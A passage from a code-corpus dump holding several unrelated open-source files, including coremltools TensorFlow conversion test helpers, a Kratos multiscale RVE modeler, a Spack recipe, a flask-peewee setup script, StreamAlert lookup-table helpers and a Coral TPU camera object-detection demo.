return self.mana_sequence != Sequence.zero or self.gold_sequence != Sequence.zero
def is_draw(self) -> bool:
"""Whether this card draws cards at some point"""
return self.draw_sequence != Sequence.zero
def is_playable(self, context: "Context") -> bool:
"""Whether this card is playable given a context"""
return (self.cost is not None and self.cost <= context.mana + context.gold) or\
(self.land and context.land > 0)
@staticmethod
def untapped_rock(cost: int, mana: int) -> "Card":
"""Card with given cost and given mana gain"""
return Card(cost=cost, mana_sequence=Sequence.repeat(mana))
@staticmethod
def tapped_rock(cost: int, mana: int) -> "Card":
"""Card with given cost and given mana gain starting next turn"""
return Card(cost=cost, mana_sequence=Sequence.repeat(mana).prefixed_by([0]))
@staticmethod
def draw_spell(cost: int, cards: int) -> "Card":
"""Card with given cost that immediately draws given amount of cards"""
return Card(cost=cost, draw_sequence=Sequence.once(cards))
Card.untapped_land = Card("Untapped land", cost=None, land=True, mana_sequence=Sequence.one)
Card.tapped_land = Card("Tapped land", cost=None, land=True,
mana_sequence=Sequence.one.prefixed_by([0]))
Card.cantrip = Card.draw_spell(1, 1)
Card.filler = Card("Filler", cost=20000)
|
the-stack_106_15828
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import six
from coremltools import TensorType
import pytest
tf = pytest.importorskip("tensorflow", minversion="1.14.0")
from coremltools.converters.mil.testing_utils import compare_shapes, compare_backend
from coremltools.converters.mil.testing_reqs import converter
from tensorflow.python.framework import dtypes
import tempfile
import os
from tensorflow.python.tools.freeze_graph import freeze_graph as freeze_g
frontend = "tensorflow"
def make_tf_graph(input_types):
"""
Decorator to help construct TensorFlow 1.x model.
Parameters
----------
input_types: list of tuple
List of input types. E.g. [(3, 224, 224, tf.int32)] represents one input,
with shape (3, 224, 224), and the expected data type is tf.int32. The
dtype is optional, in case it's missing, tf.float32 will be used.
Returns
-------
tf.Graph, list of str, list of str
"""
def wrapper(ops):
with tf.Graph().as_default() as model:
inputs = []
for input_type in input_types:
input_type = tuple(input_type)
if len(input_type) > 0 and isinstance(input_type[-1], dtypes.DType):
shape, dtype = input_type[:-1], input_type[-1]
else:
shape, dtype = input_type, tf.float32
inputs.append(tf.placeholder(shape=shape, dtype=dtype))
outputs = ops(*inputs)
return model, inputs, outputs
return wrapper
def get_tf_keras_io_names(model):
"""
Utility function to get tf.keras inputs/outputs names from a tf.keras model.
Parameter
---------
model: tf.keras.Model
"""
input_names, output_names = [], []
for i in model.inputs:
input_names.append(i.name.split(":")[0])
for o in model.outputs:
output_names.append(o.name.split(":")[0].split("/")[-1])
return input_names, output_names
def get_tf_node_names(tf_nodes, mode="inputs"):
"""
Inputs:
- tf_nodes: list[str]. Names of target placeholders or output variables.
- mode: str. When mode == 'inputs', strip the tensor suffix from the input
names, for instance 'placeholder:0' becomes 'placeholder'.
When mode == 'outputs', we keep the original suffix number, so
'bn:0' will still be 'bn:0'.
Return a list of names from the given list of TensorFlow nodes. A tensor name's
postfix is eliminated if there's no ambiguity. Otherwise, postfix is kept
"""
if not isinstance(tf_nodes, list):
tf_nodes = [tf_nodes]
names = list()
for n in tf_nodes:
tensor_name = n if isinstance(n, six.string_types) else n.name
if mode == "outputs":
names.append(tensor_name)
continue
name = tensor_name.split(":")[0]
if name in names:
# keep postfix notation for multiple inputs/outputs
names[names.index(name)] = name + ":" + str(names.count(name) - 1)
names.append(tensor_name)
else:
names.append(name)
return names
def tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend="tensorflow", backend="nn_proto"
):
"""
Parameters
----------
graph: tf.Graph
TensorFlow 1.x model in tf.Graph format.
feed_dict: dict of (tf.placeholder, np.array)
Dict of placeholder and value pairs representing inputs.
output_nodes: tf.node or list[tf.node]
List of names representing outputs.
frontend: str
Frontend to convert from.
backend: str
Backend to convert to.
-----------
Returns Proto, Input Values, Output Names
"""
if isinstance(output_nodes, tuple):
output_nodes = list(output_nodes)
if not isinstance(output_nodes, list):
output_nodes = [output_nodes]
# Convert TF graph.
input_names = get_tf_node_names(list(feed_dict.keys()), mode="inputs")
output_names = get_tf_node_names(output_nodes, mode="outputs")
input_values = {name: val for name, val in zip(input_names, feed_dict.values())}
inputs = [TensorType(name=input_name) for input_name in input_names]
mlmodel = converter.convert(
graph, inputs=inputs, outputs=output_names, source=frontend, convert_to=backend
)
proto = mlmodel.get_spec()
return proto, input_values, output_names, output_nodes
def load_tf_pb(pb_file):
"""
Loads a pb file to tf.Graph
"""
# We load the protobuf file from the disk and parse it to retrieve the
# unserialized graph_def
with tf.io.gfile.GFile(pb_file, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
# Then, we import the graph_def into a new Graph and return it
with tf.Graph().as_default() as graph:
# The name var will prefix every op/nodes in your graph
# Since we load everything in a new graph, this is not needed
tf.import_graph_def(graph_def, name="")
return graph
def run_compare_tf(
graph,
feed_dict,
output_nodes,
use_cpu_only=False,
frontend_only=False,
frontend="tensorflow",
backend="nn_proto",
atol=1e-04,
rtol=1e-05,
validate_shapes_only=False,
freeze_graph=False,
):
"""
Utility function to convert and compare a given TensorFlow 1.x model.
Parameters
----------
graph: tf.Graph
TensorFlow 1.x model in tf.Graph format.
feed_dict: dict of (tf.placeholder, np.array)
Dict of placeholder and value pairs representing inputs.
output_nodes: tf.node or list[tf.node]
List of names representing outputs.
use_cpu_only: bool
If true, use CPU only for prediction, otherwise, use GPU also.
frontend_only: bool
If true, skip the prediction call, only validate conversion.
frontend: str
Frontend to convert from.
backend: str
Backend to convert to.
atol: float
The absolute tolerance parameter.
rtol: float
The relative tolerance parameter.
validate_shapes_only: bool
If true, skip element-wise value comparison.
"""
proto, input_key_values, output_names, output_nodes = tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend, backend
)
if frontend_only:
return
if not isinstance(output_nodes, (tuple, list)):
output_nodes = [output_nodes]
if freeze_graph:
model_dir = tempfile.mkdtemp()
graph_def_file = os.path.join(model_dir, "tf_graph.pb")
checkpoint_file = os.path.join(model_dir, "tf_model.ckpt")
static_model_file = os.path.join(model_dir, "tf_static.pb")
coreml_model_file = os.path.join(model_dir, "coreml_model.mlmodel")
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
tf_outputs = sess.run(output_nodes, feed_dict=feed_dict)
tf.train.write_graph(sess.graph, model_dir, graph_def_file, as_text=False)
saver = tf.train.Saver()
saver.save(sess, checkpoint_file)
freeze_g(
input_graph=graph_def_file,
input_saver="",
input_binary=True,
input_checkpoint=checkpoint_file,
output_node_names=",".join([n.op.name for n in output_nodes]),
restore_op_name="save/restore_all",
filename_tensor_name="save/Const:0",
output_graph=static_model_file,
clear_devices=True,
initializer_nodes="",
)
graph = load_tf_pb(static_model_file)
# Need to convert again using frozen graph
proto, input_key_values, output_names, output_nodes = tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend, backend
)
else:
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
tf_outputs = sess.run(output_nodes, feed_dict=feed_dict)
expected_outputs = {name: val for name, val in zip(output_names, tf_outputs)}
if validate_shapes_only:
compare_shapes(proto, input_key_values, expected_outputs, use_cpu_only)
else:
compare_backend(
proto,
input_key_values,
expected_outputs,
use_cpu_only,
atol=atol,
rtol=rtol,
also_compare_shapes=True,
)
return proto
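# Hypothetical end-to-end sketch tying the helpers above together (assumed; it
# requires a TF 1.x session environment and numpy imported as np):
#
#   model, inputs, outputs = relu_graph   # from the make_tf_graph sketch above
#   feed = {inputs[0]: np.random.rand(1, 224, 224, 3).astype(np.float32)}
#   run_compare_tf(model, feed, outputs, use_cpu_only=True)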
def layer_counts(spec, layer_type):
spec_type_map = {
"neuralNetworkClassifier": spec.neuralNetworkClassifier,
"neuralNetwork": spec.neuralNetwork,
"neuralNetworkRegressor": spec.neuralNetworkRegressor,
}
nn_spec = spec_type_map.get(spec.WhichOneof("Type"))
if nn_spec is None:
raise ValueError("MLModel must have a neural network")
n = 0
for layer in nn_spec.layers:
if layer.WhichOneof("layer") == layer_type:
n += 1
return n
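# Hypothetical usage sketch (not part of the original helpers); it assumes
# `proto` is the spec returned by run_compare_tf() above and that "convolution"
# is a layer type present in the converted network:
#
#   n_conv = layer_counts(proto, "convolution")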
|
the-stack_106_15829
|
import os
from robolearn.old_utils.plots.specific_cost import plot_specific_cost
method = 'gps' # 'gps' or 'trajopt'
gps_directory_names = ['gps_log1']
gps_models_labels = ['gps_log1']
itr_to_load = None # list(range(8))
block = False
specific_costs = None #[4] # None for all costs
dir_names = [os.path.dirname(os.path.realpath(__file__)) + '/../' + dir_name
for dir_name in gps_directory_names]
plot_specific_cost(dir_names, itr_to_load=itr_to_load, method=method,
gps_models_labels=gps_models_labels, block=block,
specific_costs=specific_costs)
input('Showing plots. Press a key to close...')
|
the-stack_106_15830
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyRequestsOauthlib(PythonPackage):
"""This project provides first-class OAuth library support for Requests.
"""
homepage = "https://github.com/requests/requests-oauthlib"
pypi = "requests-oauthlib/requests-oauthlib-1.2.0.tar.gz"
version('1.3.0', sha256='b4261601a71fd721a8bd6d7aa1cc1d6a8a93b4a9f5e96626f8e4d91e8beeaa6a')
version('1.2.0', sha256='bd6533330e8748e94bf0b214775fed487d309b8b8fe823dc45641ebcd9a32f57')
version('0.3.3', sha256='37557b4de3eef50d2a4c65dc9382148b8331f04b1c637c414b3355feb0f007e9')
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:2.8,3.4:', type=('build', 'run'))
|
the-stack_106_15831
|
## @package Rve
# This module contains classes (Rve Modelers) that are used
# to handle the generation, assignment and tracking of
# RveConstitutiveLaws.
#
# More details
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import datetime
import time
from KratosMultiphysics import *
from KratosMultiphysics.ExternalSolversApplication import *
from KratosMultiphysics.MultiScaleApplication import *
from KratosMultiphysics.SolidMechanicsApplication import *
import TK_Props
## RVEPropertyMap
#
# Detailed description...
class RVEPropertyMap:
## Constructor
def __init__(self,
PropertyID,
Values):
self.PropertyID = PropertyID
self.Values = Values
## RVEModelPartPrototype
#
# Detailed description...
class RVEModelPartPrototype:
## Constructor
def __init__(self,
ModelName,
NodalVariables = ([
DISPLACEMENT,
REACTION,
]),
DOFs = ([
(DISPLACEMENT_X, REACTION_X),
(DISPLACEMENT_Y, REACTION_Y),
(DISPLACEMENT_Z, REACTION_Z),
]),
BufferSize = 2,
RVEPropertyMapList = None):
# create the model part
self.Model = ModelPart(ModelName)
# add nodal variables
for ivar in NodalVariables:
self.Model.AddNodalSolutionStepVariable(ivar)
# read the model part
model_part_io = ModelPartIO(ModelName)
model_part_io.ReadModelPart(self.Model)
# add all degrees of freedom
for inode in self.Model.Nodes:
for idof in DOFs:
inode.AddDof(idof[0], idof[1])
# set buffer size
self.Model.SetBufferSize(BufferSize)
# set up all the properties
for ipmap in RVEPropertyMapList:
TK_Props.Property(
Pro = self.Model.Properties[ipmap.PropertyID],
Values = ipmap.Values
)
## RVEStrainSize
#
# Detailed description...
class RVEStrainSize:
RVE_PLANE_STRESS = 0
RVE_PLANE_STRAIN = 1
RVE_3D = 2
## The RveModeler for continuum elements.
#
# This class is a specialized RveModeler for continuum elements.
class RVEModelerSolid:
## Constructor.
def __init__(self,
MicroModelPartPrototype,
StrainSize,
ResultsIOClass,
ResultsOnNodes = [],
ResultsOnGaussPoints = [],
RveConstraintHandlerClass = RveConstraintHandler_ZBF_SD,
RveHomogenizerClass = RveHomogenizer,
SchemeClass = RveStaticScheme,
LinearSolverClass = SuperLUSolver,
MaxIterations = 10,
CalculateReactions = False,
ReformDofSetAtEachIteration = False,
MoveMesh = False,
ConvergenceCriteriaClass = ResidualNormCriteria,
ConvergenceRelativeTolerance = 1.0E-6,
ConvergenceAbsoluteTolerance = 1.0E-9,
ConvergenceIsVerbose = False,
TargetElementList = [],
OutputElementList = [],
BoundingPolygonNodesID = None,
# NEW
SecondaryRveModeler = None,
IsSecondary = True):
self.MicroModelPartPrototype = MicroModelPartPrototype
self.StrainSize = StrainSize
self.BoundingPolygonNodesID = BoundingPolygonNodesID
if(self.StrainSize == RVEStrainSize.RVE_PLANE_STRESS):
self.RveAdapterClass = RvePlaneStressAdapterV2
self.RveMaterialClass = RveConstitutiveLawV2PlaneStress
elif(self.StrainSize == RVEStrainSize.RVE_PLANE_STRAIN):
raise Exception("Rve Plane Strain Not Yet Implemented")
else: # RVEStrainSize.RVE_3D):
self.RveAdapterClass = Rve3DAdapterV2
self.RveMaterialClass = RveConstitutiveLawV23D
self.RveGeometryDescr = None
self.ResultsIOClass = ResultsIOClass
self.ResultsOnNodes = ResultsOnNodes
self.ResultsOnGaussPoints = ResultsOnGaussPoints
self.RveConstraintHandlerClass = RveConstraintHandlerClass
self.RveHomogenizerClass = RveHomogenizerClass
self.SchemeClass = SchemeClass
self.LinearSolverClass = LinearSolverClass
self.MaxIterations = MaxIterations
self.CalculateReactions = CalculateReactions
self.ReformDofSetAtEachIteration = ReformDofSetAtEachIteration
self.MoveMesh = MoveMesh
self.ConvergenceCriteriaClass = ConvergenceCriteriaClass
self.ConvergenceRelativeTolerance = ConvergenceRelativeTolerance
self.ConvergenceAbsoluteTolerance = ConvergenceAbsoluteTolerance
self.ConvergenceIsVerbose = ConvergenceIsVerbose
self.TargetElementList = TargetElementList
self.OutputElementList = OutputElementList
self.TrackList = {}
self.Initialized = False
# NEW <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
self.SecondaryRveModeler = SecondaryRveModeler
self.IsSecondary = IsSecondary
if(self.IsSecondary == False):
if(self.SecondaryRveModeler is None):
raise Exception("A primary RVE modeler requires a SecondaryRveModeler")
# NEW <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
## Initialize
#
# called at the very beginning of the analysis history to
# perform all initializations. This method should be called
# only once.
def Initialize(self, Model):
if(self.Initialized == False):
# initialize the geometry descriptor
self.RveGeometryDescr = RveGeometryDescriptor()
if(self.BoundingPolygonNodesID is not None):
self.RveGeometryDescr.SetUserCornerNodes(self.BoundingPolygonNodesID)
self.RveGeometryDescr.Build(self.MicroModelPartPrototype.Model)
print(self.RveGeometryDescr)
# generate,assign and track all required rve's
if(self.IsSecondary):
# the primary modeler has already generated the list of clones!
# we need to know at which index of that list we currently are
self.clone_list_counter = 0
for elem_id in self.TargetElementList:
elem = Model.Elements[elem_id]
dummy = self.__assign_rve_constitutive_law(elem)
self.clone_list_counter = 0 # not strictly necessary, but we reset it to zero for safety
else:
# if this is the primary modeler, generate a list of [nelem*ngauss] rve clones...
self.stored_rvemdpa_clones=[]
for elem_id in self.TargetElementList:
elem = Model.Elements[elem_id]
elem_rvemdpa_clone_list = self.__assign_rve_constitutive_law(elem)
for iclone in elem_rvemdpa_clone_list:
self.stored_rvemdpa_clones.append(iclone)
# ... and copy it into the secondary modeler (which must not generate it again!)
self.SecondaryRveModeler.stored_rvemdpa_clones = self.stored_rvemdpa_clones
# initialize the output
self.__initialize_output()
# set initialization flag
self.Initialized = True
## OnBeforeSolutionStage
#
# called before each solutions stage
def OnBeforeSolutionStage(self, Model):
pass
## OnSolutionStageCompleted
#
# called after each solutions stage
def OnSolutionStageCompleted(self, Model):
pass
## OnBeforeSolutionStep
#
# called before each solutions steps is solved
def OnBeforeSolutionStep(self, Model):
pass
## OnSolutionStepCompleted
#
# called after each solutions steps is solved
def OnSolutionStepCompleted(self, Model):
# write the output for this time step
self.__write_output(Model.ProcessInfo[TIME])
## Finalize
#
# called at the end of the analysis history to
# perform all finalizations. This method should be called
# only once.
def Finalize(self, Model):
if(self.Initialized == True):
# finalize the output
self.__finalize_output()
# private methods *******************************************************************************************
## __generate_rve_constitutive_law
#
# This method generates a new rve constitutive law
# by cloning the rve model part prototype and creating
# a new rve constitutive law out of it.
# This method is meant to be private, do NOT call it explicitly
def __generate_rve_constitutive_law(self):
if(self.IsSecondary):
if( self.clone_list_counter >= len(self.stored_rvemdpa_clones) ):
raise Exception("The current rve clone counter is outside the stored clone list")
current_rve_primary_clone = self.stored_rvemdpa_clones[ self.clone_list_counter ]
modelPartClone = ModelPart(self.MicroModelPartPrototype.Model.Name + "_RVE")
RveCloneModelPart_2Physics(self.MicroModelPartPrototype.Model, modelPartClone, current_rve_primary_clone) # clone the model part prototype
self.clone_list_counter = self.clone_list_counter + 1 # advance to the next stored clone
else:
modelPartClone = ModelPart(self.MicroModelPartPrototype.Model.Name + "_RVE")
RveCloneModelPart(self.MicroModelPartPrototype.Model, modelPartClone) # clone the model part prototype
msData = RveMacroscaleData()
linSolver = self.LinearSolverClass()
timeScheme = self.SchemeClass()
timeScheme.Check(modelPartClone)
convCriteria = self.ConvergenceCriteriaClass(
self.ConvergenceRelativeTolerance,
self.ConvergenceAbsoluteTolerance,
self.ConvergenceIsVerbose,
)
constraint_handler = self.RveConstraintHandlerClass()
homogenizer = self.RveHomogenizerClass()
adapter = self.RveAdapterClass() # generate the rve adapter
adapter.SetRveData(
modelPartClone,
msData,
self.RveGeometryDescr,
constraint_handler,
RveLinearSystemOfEquations(linSolver),
homogenizer,
timeScheme,
convCriteria
) # set all data (just for testing...)
rveLaw = self.RveMaterialClass(adapter) # finally generate the constitutive law adapter
for i in range(modelPartClone.GetBufferSize()):
modelPartClone.CloneTimeStep(0.0)
return (rveLaw, modelPartClone) # note: this returns a tuple <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
## __track_rve_constitutive_law
#
# This method tracks a rve constitutive law
# at a given element in a given gauss point.
# This method is meant to be private, do NOT call it explicitly
def __track_rve_constitutive_law(self, rveLaw, elemID, gpID):
elInfo = SolidElementInfo(elemID, gpID)
if( next((x for x in self.OutputElementList if x == elemID), None) is not None ):
outputFileName = self.MicroModelPartPrototype.Model.Name + "__" + elInfo.GetStringExtension()
rveLawIO = self.ResultsIOClass(rveLaw.GetModelPart(), outputFileName, self.ResultsOnNodes, self.ResultsOnGaussPoints)
self.TrackList[elInfo] = (rveLaw, rveLawIO)
else:
self.TrackList[elInfo] = (rveLaw, None)
## __assign_rve_constitutive_law
#
# This method assigns a rve constitutive law
# at a given element.
# This method is meant to be private, do NOT call it explicitly
def __assign_rve_constitutive_law(self, Element):
# list of generated rve mdpa clones
rve_mdpa_clones = []
# get the number of integration points
elemIntPoints = Element.GetIntegrationPoints()
num_gp = len(elemIntPoints)
elem_id = Element.Id
# get a reference to the process info
pinfo = self.MicroModelPartPrototype.Model.ProcessInfo
# prepare the list of constitutive laws for the element
constitutiveLaws = []
# for each element integration point ...
for gp_id in range(num_gp):
# generate a new rve constitutive law
rve_law__rve_mdpa__tuple = self.__generate_rve_constitutive_law()
aRveLaw = rve_law__rve_mdpa__tuple[0]
constitutiveLaws.append(aRveLaw)
# TODO: check what rve law to track...
# for the moment let's track them all
self.__track_rve_constitutive_law(aRveLaw, elem_id, gp_id)
# store the rve mdpa clone
rve_mdpa_clones.append(rve_law__rve_mdpa__tuple[1])
# assign the list of constitutive laws
Element.SetValuesOnIntegrationPoints(CONSTITUTIVE_LAW_POINTER, constitutiveLaws, pinfo)
return rve_mdpa_clones
## Initializes the output for the tracked rves (only if required)
def __initialize_output(self):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Initialize()
## Writes the output for the tracked rves (only if required)
def __write_output(self, currentTime):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Write(currentTime)
## Finalizes the output for the tracked rves (only if required)
def __finalize_output(self):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Finalize()
def GENERATE_RVE_LAW(self):
return self.__generate_rve_constitutive_law()
def TRACK_RVE_LAW(self,rveLaw,elemID,gpID):
return self.__track_rve_constitutive_law(rveLaw,elemID,gpID)
def INIT_OUTPUT(self):
return self.__initialize_output()
def WRITE_OUTPUT(self,time):
return self.__write_output(time)
def FIN_OUTPUT(self):
return self.__finalize_output()
## Prints an extensive description of this object
def __print_info(self):
print ("")
print ("====================================================")
print ("RveModelerShell - Info:")
print ("====================================================")
print ("MODEL PART - PROTOTYPE:")
print (self.MicroModelPartPrototype.Model)
print ("====================================================")
print ("TRACK LIST:")
ii = 0
print ("+--------------------------------------------------------+")
for key, value in self.TrackList.items():
print ("AT[", ii, "]")
print ("Info:")
print (key)
print ("(RveMaterial, IO)")
print (value)
print ("Micro Model Clone:")
micro = value[0].GetModelPart()
print (hex(id(micro)))
print (micro)
print ("+--------------------------------------------------------+")
ii+=1
# class RVE_MPI_Utils ( 1) copy prototype; 2) partition target/output elements; 3) generate a modeler for each node)
|
the-stack_106_15832
|
from setuptools import setup, find_packages
requirements = ['Flask', 'werkzeug', 'jinja2', 'peewee>=3.0.0', 'wtforms', 'wtf-peewee']
setup(
name='flask-peewee',
version='3.0.4-propel',
url='http://github.com/coleifer/flask-peewee/',
license='MIT',
author='Charles Leifer',
author_email='[email protected]',
description='Peewee integration for flask',
packages=find_packages(),
package_data={
'flask_peewee': [
'static/*/*.css',
'static/*/*.js',
'static/*/*.gif',
'static/*/*.png',
'templates/*.html',
'templates/*/*.html',
'templates/*/*/*.html',
'tests/*.html',
'tests/*/*.html',
],
},
zip_safe=False,
platforms='any',
install_requires=requirements,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
the-stack_106_15834
|
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from streamalert.shared.lookup_tables.drivers import PersistenceDriver
# pylint: disable=protected-access
class LookupTablesMagic:
"""Namespace full of magic methods that dig around the public interface of LookupTables.
These methods are not on the public interface by design to prevent these access patterns from
being utilized in "normal" Lambda code.
"""
@staticmethod
def get_all_table_data(table):
"""
Return all of the data in the given lookup table as a dict. Only works with S3, and you
should DEFINITELY AVOID USING THIS.
Args:
- table (LookupTable)
Returns:
dict
"""
if table.driver_type != PersistenceDriver.TYPE_S3:
raise RuntimeError("Cannot use lookup_table helper on non-S3 table.")
# Make a single dummy call to force the table to initialize
table.get('dummy', None)
# Do some black magic tomfoolery
return table._driver._cache._data
@staticmethod
def set_table_value(table, key, new_value):
"""Set a value into a LookupTable and then immediately commit it.
Args:
- table (LookupTable)
- key (str)
- new_value (str|int|list|dict|mixed)
"""
table._driver.set(key, new_value)
table._driver.commit()
@staticmethod
def get_all_tables(lookup_tables_core):
"""Returns all lookup tables, keyed by their names
Args:
- lookup_tables_core (LookupTablesCore)
Returns:
dict[str, LookupTable]
"""
return lookup_tables_core._tables
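# Hypothetical usage sketch (not part of the original module); it assumes an
# initialized LookupTablesCore instance named `core` holding an S3-backed table
# called "my_table":
#
#   table = LookupTablesMagic.get_all_tables(core)["my_table"]
#   data = LookupTablesMagic.get_all_table_data(table)  # whole table as a dict (S3 only)
#   LookupTablesMagic.set_table_value(table, "some_key", "some_value")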
|
the-stack_106_15835
|
"""A demo for object detection or image classification using CORAL TPU.
This example is intended to eventually run on a Raspberry Pi, but for now it runs on a
Linux machine.
The only pending change to make it run on the Raspberry Pi is frame capture, which
requires a different method through the picamera python library.
See:
https://www.pyimagesearch.com/2015/03/30/accessing-the-raspberry-pi-camera-with-opencv-and-python
For running in a Linux PC, follow the standard installation of the CORAL TPU USB, plus
installing Python-OpenCV
Examples (Running under python-tflite-source/edgetpu directory):
- Object recognition:
python3 demo/my_TPU_image_recognition.py \
--model=test_data/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--label=test_data/coco_labels.txt --mode=OBJECT_DETECTION \
--camera=0
- Image classification (plants from iNat):
python3 demo/my_TPU_image_recognition.py \
--model=test_data/mobilenet_v2_1.0_224_inat_plant_quant_edgetpu.tflite \
--label=test_data/inat_plant_labels.txt --mode=IMAGE_CLASSIFICATION
- Image classification (InceptionV4 ImageNet)
python3 demo/my_TPU_image_recognition.py \
--model test_data/inception_v4_299_quant_edgetpu.tflite \
--label=test_data/imagenet_labels.txt --mode=IMAGE_CLASSIFICATION
- Face detection:
python3 demo/object_detection.py \
--model='test_data/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite' \
--mode=IMAGE_CLASSIFICATION'
- Pet detection:
python3 demo/object_detection.py \
--model='test_data/ssd_mobilenet_v1_fine_tuned_edgetpu.tflite' \
--label='test_data/pet_labels.txt' \
"""
import argparse
import platform
import subprocess
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.detection.engine import DetectionEngine
from PIL import Image
from PIL import ImageDraw
import numpy as np
import time
from collections import deque, Counter
#For webcam capture and drawing boxes
import cv2
#picamera
from picamera import PiCamera
import io
# Parameters for visualizing the labels and boxes
FONT = cv2.FONT_HERSHEY_SIMPLEX
FONT_SIZE = 0.7
LABEL_BOX_PADDING = 5
LABEL_BOX_OFFSET_TOP = int(20 * FONT_SIZE) + LABEL_BOX_PADDING
LINE_WEIGHT = 1
# Function to read labels from text files.
def read_label_file(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model', help='Path of the detection model.', required=True)
parser.add_argument(
'--label', help='Path of the labels file.')
parser.add_argument(
'--mode', help='Mode for the detection: OBJECT_DETECTION or IMAGE_CLASSIFICATION',
required=True)
parser.add_argument(
'--camera', help='Camera source (if multiple available)', type=int, required=False)
args = parser.parse_args()
# Initialize engine.
if args.mode == "OBJECT_DETECTION":
engine = DetectionEngine(args.model)
elif args.mode == "IMAGE_CLASSIFICATION":
engine = ClassificationEngine(args.model)
else:
print("Please insert the mode from OBJECT_DETECTION or IMAGE_CLASSIFICATION")
exit()
labels = read_label_file(args.label) if args.label else None
label = None
camera = args.camera if args.camera else 0
# Initialize the camera
#cam = cv2.VideoCapture(camera)
camera = PiCamera()
time.sleep(2)
camera.resolution = (640, 480)
# Create the in-memory stream
stream = io.BytesIO()
# Initialize the timer for fps
start_time = time.time()
frame_times = deque(maxlen=40)
while True:
#ret, cv2_im = cam.read()
stream = io.BytesIO() #wipe the contents
camera.capture(stream, format='jpeg', use_video_port=True)
stream.seek(0)
pil_im = Image.open(stream)
cv2_im = np.array(pil_im)
cv2_im = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
if args.mode == "OBJECT_DETECTION":
ans = engine.DetectWithImage(pil_im, threshold=0.05, keep_aspect_ratio=True,
relative_coord=False, top_k=10)
if ans:
for obj in ans:
if obj.score > 0.4:
if labels:
label = labels[obj.label_id] + " - {0:.2f}".format(obj.score)
draw_rectangles(obj.bounding_box, cv2_im, label=label)
else:
draw_text(cv2_im, 'No object detected!')
else:
i = 0
for result in engine.ClassifyWithImage(pil_im, top_k=5):
if result:
label = labels[result[0]]
score = result[1]
draw_text(cv2_im, label, i)
i += 1
else:
draw_text(cv2_im, 'No classification detected!')
lastInferenceTime = engine.get_inference_time()
frame_times.append(time.time())
fps = len(frame_times)/float(frame_times[-1] - frame_times[0] + 0.001)
draw_text(cv2_im, "{:.1f} / {:.2f}ms".format(fps, lastInferenceTime))
#print("FPS / Inference time: " + "{:.1f} / {:.2f}ms".format(fps, lastInferenceTime))
#flipping the image: cv2.flip(cv2_im, 1)
#cv2_im = cv2.resize(cv2_im, (800, 600))
cv2.imshow('object detection', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
exit()
break
#end
#cv2.VideoCapture.release(cam)
def draw_rectangles(rectangles, image_np, label=None):
p1 = (int(rectangles[0][0]), int(rectangles[0][1]))
p2 = (int(rectangles[1][0]), int(rectangles[1][1]))
cv2.rectangle(image_np, p1, p2, color=(255, 0, 0), thickness=LINE_WEIGHT)
if label:
cv2.rectangle(image_np, (p1[0], p1[1]-LABEL_BOX_OFFSET_TOP), (p2[0], p1[1] + LABEL_BOX_PADDING),
color=(255, 0, 0),
thickness=-1)
cv2.putText(image_np, label, p1, FONT, FONT_SIZE, (255, 255, 255), 1, cv2.LINE_AA)
#imgname = str(time.time())
#cv2.imwrite('/home/pi/development/Coral-TPU/imgs/' + imgname + '.jpg', image_np)
def draw_text(image_np, label, pos=0):
p1 = (0, pos*30+20)
#cv2.rectangle(image_np, (p1[0], p1[1]-20), (800, p1[1]+10), color=(0, 255, 0), thickness=-1)
cv2.putText(image_np, label, p1, FONT, FONT_SIZE, (0, 0, 0), 1, cv2.LINE_AA)
if __name__ == '__main__':
main()
|
the-stack_106_15837
|
import argparse
import scipy
from scipy import ndimage
import numpy as np
import sys
from packaging import version
from multiprocessing import Pool
import torch
from torch.autograd import Variable
import torchvision.models as models
import torch.nn.functional as F
from torch.utils import data, model_zoo
from model.deeplab import Res_Deeplab
from model.deeplab_multi import DeeplabMulti
from model.deeplab_vgg import DeeplabVGG
